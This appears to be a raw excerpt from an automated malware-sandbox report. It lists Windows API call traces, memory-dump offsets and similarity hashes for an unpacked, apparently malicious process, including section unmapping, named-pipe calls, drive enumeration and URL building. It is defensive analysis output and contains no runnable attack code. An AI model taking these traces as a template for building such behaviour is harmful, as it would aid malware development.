    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
